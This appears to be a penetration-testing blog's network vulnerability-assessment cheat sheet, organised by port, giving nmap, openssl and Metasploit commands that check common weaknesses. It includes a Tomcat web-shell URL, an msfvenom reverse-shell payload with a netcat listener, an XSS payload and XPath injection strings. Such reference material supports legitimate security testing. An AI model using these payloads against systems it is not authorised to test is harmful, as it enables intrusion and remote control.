Penetration Testing - Network


Manual Vulnerability Assessment

TCP/21: FTP

Anonymous FTP Enabled 
anonymous
guest

TCP/22: SSH

nmap -p 22 --script ssh2-enum-algos <ip_address>

SSH Weak Algorithms Supported
SSH Server CBC Mode Ciphers Enabled
ssh -oCiphers=<ciphers> <ip_address>
SSH Weak MAC Algorithms Enabled 
ssh -oMACs=<algorithm> <ip_address>
SSH Protocol v1 Supported
ssh -1 <ip_address> -v

Hardening on SSH
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com

TCP/23: Telnet

Unencrypted Telnet Server
telnet <ip_address> 23

TCP/25: SMTP

SMTP Service Cleartext Login Permitted
telnet <ip_address> 25
EHLO <ip_address>
AUTH LOGIN

Mailserver answer to VRFY and EXPN requests *
nc <ip_address> 25
EXPN root
VRFY root

TCP/53: DNS

DNS Server Cache Snooping Remote Information Disclosure
nmap -sU -p 53 --script dns-cache-snoop <ip_address>
nslookup example.com <ip_address>
DNS Server Recursive Query Cache Poisoning Weakness
nmap -Pn -sU -p 53 --script=dns-recursion <ip_address>
DNS Server Spoofed Request Amplification DDoS
msf > use auxiliary/scanner/dns/dns_amp
dig . NS @<ip_address>

DNS Server Zone Transfer Information Disclosure (AXFR)
dig axfr @<ip_address> <domain.name>

MS11-058: Vulnerabilities in DNS Server Could Allow Remote Code Execution (2562485) (uncredentialed check)
MS12-017: Vulnerability in DNS Server Could Allow Denial of Service (2647170) (uncredentialed check)
dig @@<ip_address> version.bind txt chaos

TCP/79: Finger

Finger 0@host Information Disclosure
msf > use auxiliary/scanner/finger/finger_users

TCP/80: HTTP

HTTP TRACE / TRACK Methods Allowed
curl -v -X TRACE <ip_address>:<port>

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)
*Vulnerable: HTTP/1.1 416 Requested Range Not Satisfiable
curl -v <ip_address>:<port>/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

Apache Server ETag Header Information Disclosure 
curl -v -X GET <ip_address>:<port>

Please refer to https://www.axcelsec.com/2017/12/web-server-hardening-apache.html for more information.

TCP/110: SMTP

POP3 Cleartext Logins Permitted
telnet <ip_address> 110
USER testuser
PASS 123456

TCP/389: Lightweight Directory Access Protocol (LDAP)

LDAP NULL BASE Search Access   
ldapsearch -h <ip_address> -x -s base

TCP/443: HTTPS 

sslscan <ip_address>


 SSL Version 2 and 3 Protocol Detection
openssl s_client -connect <ip_address>:<port> -ssl3

 SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
echo | timeout 3 openssl s_client -connect 10.171.72.7:10005 >/dev/null 2>&1; if [[ $? != 0 ]]; then echo "UNKNOWN: 10.171.72.7:10005 timeout or connection error"; else echo | openssl s_client -connect 10.171.72.7:10005 -ssl3 2>&1 | grep -qo "sslv3 alert handshake failure\|SSL3_GET_RECORD:wrong version number" && echo "OK: HOSTNAMEORIPADDRESS Not vulnerable" || echo "FAIL: 10.171.72.7:10005 vulnerable; sslv3 connection accepted"; fi

Heartbleed 
python heartbleed-poc.py -n100 -f dump.bin <ip_address>
msf  > use auxiliary/scanner/ssl/openssl_heartbleed

SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
openssl s_client -connect <ip_address>:<port_no> -cipher 'EXP'
SSL Certificate Chain Contains RSA Keys Less Than 2048 bits<
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -text -noout | grep "Public-Key"
SSL Certificate Signed Using Weak Hashing Algorithm
openssl s_client -connect 10.31.1.3:2381 2>/dev/null | openssl x509 -text -noout | grep "Signature Algorithm"
SSL Certificate Expiry
openssl s_client -connect <ip_address>:<port> | grep "notAfter"

SSL Certificate with Wrong Hostname
nmblookup -A 10.171.72.5 | grep '<00' | grep -v GROUP | awk '{print $1}'

SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
openssl s_client -connect <ip_address>:<port> | grep "Renegotiation"
Vulnerable: Secure Renegotiation IS NOT supported

SSL 64-bit Block Size Cipher Suites Supported (SWEET32)
openssl s_client -connect <ip_address>:<port> -cipher DES-CBC3-SHA
SSL RC4 Cipher Suites Supported (Bar Mitzvah)
openssl s_client -connect <ip_address>:<port> -cipher RC4-MD5
openssl s_client -connect <ip_address>:<port> -cipher RC4-SHA

ESXi Multiple Vulnerabilities 
nmap --script vmware-version -p443 <ip_address>
https://<ip_address>/sdk/vim.wsdl
POST https://<ip_address>/sdk
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
 <operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
 <RetrieveServiceContent xmlns="urn:internalvim25">
  <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
 </RetrieveServiceContent>
</soap:Body>
</soap:Envelope>

Microsoft Exchange Server Unsupported Version Detection (Uncredentialed) 
view-source:https://<ip_address>/owa

Microsoft Exchange Client Access Server Information Disclosure 
openssl s_client -host <ip_address> -port 443

GET /autodiscover/autodiscover.xml HTTP/1.0
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP Response header WWW-Authenticate: Basic realm disclose server's internal IP address.

MS11-061: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege (2546250) (uncredentialed check)
https://<ip_address>/RDWeb/Pages/en-US/login.aspx?ReturnUrl=%22%20onmouseover%3d%22javascript%3aalert(%27Cross-site%20Scripting%27)

TCP/445: SMB

Microsoft Windows SMB NULL Session Authentication
rpcclient -U "" <ip_address>
smbclient -L <ip_address>

 Exploitation:
smbclient //<ip_address>/IPC$ -N

 SMB Signing Required
SMB Signing Disabled
nmap --script smb-security-mode -p445 <ip_address>

 Microsoft Windows SMBv1 Multiple Vulnerabilities 
nmap --script smb-protocols <ip_address>

MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
nmap -p445 --script smb-vuln-ms17-010 <ip_address>

 Concept
Request: Tree Connect AndX Request, Path: \\<IP_Address>\IPC$
Response: Tree Connect AndX Response

Request: PeekNamedPipe Request, FID: 0x0000
Response: Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES

To understand better with SMB Security, please read the article Server Message Block (SMB) Security.

TCP/512: Remote Process Execution

Rexecd Service Enabled
nmap <ip_address> --script rexec-brute -p512

TCP/1521: Oracle Database Default Listener

Oracle TNS Listener Remote Poisoning
msf > use auxiliary/scanner/oracle/tnspoison_checker

TCP/2049: Network File System (NFS)

NFS Shares World Readable
nmap -sV --script=nfs-showmount <ip_address>
apt-get install nfs-common
showmount -e <ip_address>
mount -t nfs <ip_address>:/<direcotry> <local directory> -o nolock

TCP/8080: Apache Tomcat

Tomcat Application Manager Login

 Exploitation:
auxiliary/scanner/http/tomcat_mgr_login

\fuzzdb-master\web-backdoors\jsp\laudanum\cmd.war
http://<target IP>:8080/cmd/cmd.jsp?cmd=whoami

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP> LPORT=4444 -f war > shell.war
nc -l -v -p 4444

TCP/3389: Remote Desktop Connection (RDP)

Terminal Services Encryption Level is Medium or Low
nmap -Pn --script rdp-enum-encryption -p3389 <ip_address>
Concept 
Request: ClientData
Response: ServerData - ServerSecurityData - encryptionLevel

Encryption Level *
1. Low 
2. Client Compatible (Default) 
3. High
4. FIPS Compliant
Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness
perl rdp-sec-check.pl <ip_address>
cpan Encoding::BER
Terminal Services Doesn't Use Network Level Authentication (NLA) Only
rdesktop <ip_address>
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
nmap -p3389 --script rdp-vuln-ms12-020 <ip_address>

MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (uncredentialed check)
git clone https://github.com/anexia-it/winshock-test.git
./winshock_test.sh <ip_address> <port>

Concept
MS14-066 introduced four new SSL ciphers, so a check can be made if the target system supports those previously unsupported ciphers.
  • DHE-RSA-AES256-GCM-SHA384
  • DHE-RSA-AES128-GCM-SHA256
  • AES256-GCM-SHA384
  • AES128-GCM-SHA256
winshock_test.sh uses this fact by simply checking if those ciphers are supported by the target system or not. If they are supported, the patches have been applied.

To understand better with RDP Security, please read the article Remote Desktop Protocol (RDP) Security.

UDP/123: NTP

Network Time Protocol (NTP) Mode 6 Scanner
ntpq -c rv <ip_address>
nmap -sU -p 123 --script ntp-info <ip_address>
The server should also not respond to the query.

Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS
ntpdc -n -c monlist
list of recent hosts to connect to this NTP server

UDP/161: SNMP

SNMP Agent Default Community Name (public)
onesixtyone <ip_address> -c /usr/share/doc/onesixtyone/dict.txt
./snmpcheck-1.8.pl -t <ip_address> -c public

UDP/500: ISAKMP

Internet Key Exchange (IKE) Aggressive Mode with Pre-Shared Key
ike-scan <ip_address> --id=test -A

UDP/5353: mDNS

mDNS Detection
dig @<ip_address> -p 5353 -t ptr _services._dns-sd._udp.local

Other Useful Commands

Update nmap and metasploit

apt update; apt install metasploit-framework
apt-get install nmap

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Image
Common Remote Desktop Protocol (RDP) Vulnerabilities Terminal Services Encryption Level is Medium or Low Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness Terminal Services Doesn't Use Network Level Authentication (NLA) Only Terminal Services Encryption Level is Medium or Low Vulnerability Assessment: Host Assessment: Remediation: Local Computer Policy/Computer Configuration/Administrative Templates/Windows Components/Remote Desktop Services/Remote Desktop Session Host/Security/Set client connection encryption level Set client connection encryption level to High Note: High: The High setting encrypts data sent from the client to the server and from the server to the client by using strong 128-bit encryption. Use this encryption level in environments that contain only 128-bit clients (for example, clients that run Remote Desktop Connection). Clients that do not support this encryption level cannot connect to RD Se
Read more

Damn Vulnerable Web Services (DVWS) - Walkthrough

Image
Installation Damn Vulnerable Web Services  (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. https://github.com/snoopysecurity/dvws WSDL Enumeration Spider DVWS using Burp Suite and look for service.php Requests processed by SOAP service include  check_user_information ,  owasp_apitop10 ,  population  and  return_price XPATH Injection User Login: 1' or '1'='1 User Password: 1' or '1'='1 Command Injection Original Request parameter value of name is " find "   by default  Edited Request change the parameter value of  name  from "find" to " dir "   Cross Site Tracing (XST) Hint of " The NuSOAP Library service is vulnerable to a Cross-site scripting flaw " is given by DVWS. Exploit is published at exploit DB ( https://www.exploit-db.com/e
Read more

Offensive Security Testing Guide

Image
This cheat sheet is the compilation of commands we learnt to exploit the vulnerable machines. The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP). So... Try Harder! Information Gathering Operating System Windows Interesting Path "Documents and Settings"/Administrator/Desktop file:///C:/xampp/readme_en.txt file:///C:/xampp/passwords.txt file:///C:/xampp/webdav/webdav.txt file:///C:/xampp/apache/conf/extra/httpd-dav.conf file:///C:/xampp/apache/conf/extra/httpd-xampp.conf file:///C:/xampp/apache/logs/access.log file:///C:/xampp/apache/logs/error.log file:///C:/xampp/security/webdav.htpasswd file:///C:/xampp/htdocs/dashboard/phpinfo.php file:///C:/xampp/phpmyadmin/config.inc.php file:///C:/xampp/php/logs/php_error_log file:///C:/xampp/mysql/bin/my.ini C:\Users\<User>\AppData\Local\Temp #Email Address C:\Users\<User>\AppData\Local\Microsoft\Outlook Active Connection netstat -anob #R
Read more

Server Message Block (SMB) Security

Image
Common SMB related vulnerabilities Microsoft Windows SMBv1 Multiple Vulnerabilities SMB Signing Disabled Microsoft Windows SMB NULL Session Authentication Microsoft Windows SMB Shares Unprivileged Access Network Discovery: TCP port 5357 - Web Services on Devices API (WSDAPI) File and Printer Sharing: TCP port 135 - Remote Procedure Call (RPC) TCP port 139 - NETBIOS Session Service TCP port 445 - Server Message Block (SMB) By disable NetBIOS over TCP/IP (TCP Port 139), NETBIOS name discovery will be prevented Microsoft Windows SMBv1 Multiple Vulnerabilities Vulnerability Assessment: NSE script smb-protocols can be used to check if the server supported NT LM 0.12 (SMBv1) . Host Assessment: Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath} Remediation: Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Read more

Host Configuration Assessment - Windows

Image
OS Information Gathering systeminfo wmic computersystem get domainrole 0 - Standalone workstation 1 - Member workstation 2 - Standalone server 3 - Member server 4 - Domain controller secedit /export /cfg cfg.ini > nul net user administrator > netuseradmin.txt auditpol.exe /get /category:* > auditpol.txt netsh advfirewall show allprofiles > firewall.txt net accounts > netaccount.txt gpresult /f /h evid/gporesult.html > nul accesschk /accepteula -q -a * > accesschk.txt *Simplify the process with Scgary ! User Right Assignment type cfg.ini | grep "^SeAuditPrivilege\|^SeCreatePagefilePrivilege\|^SeRemoteShutdownPrivilege\|^SeRemoteInteractiveLogonRight\|^SeEnableDelegationPrivilege\|^SeLockMemoryPrivilege\|^SeDenyNetworkLogonRight\|^SeChangeNotifyPrivilege\|^SeDebugPrivilege\|^SeDenyBatchLogonRight\|^SeCreateGlobalPrivilege\|^SeShutdownPrivilege\|^SeIncreaseQuotaPrivilege\|^SeTrustedCredManAccessPrivilege\|^SeDenyInteractiveLogonRight
Read more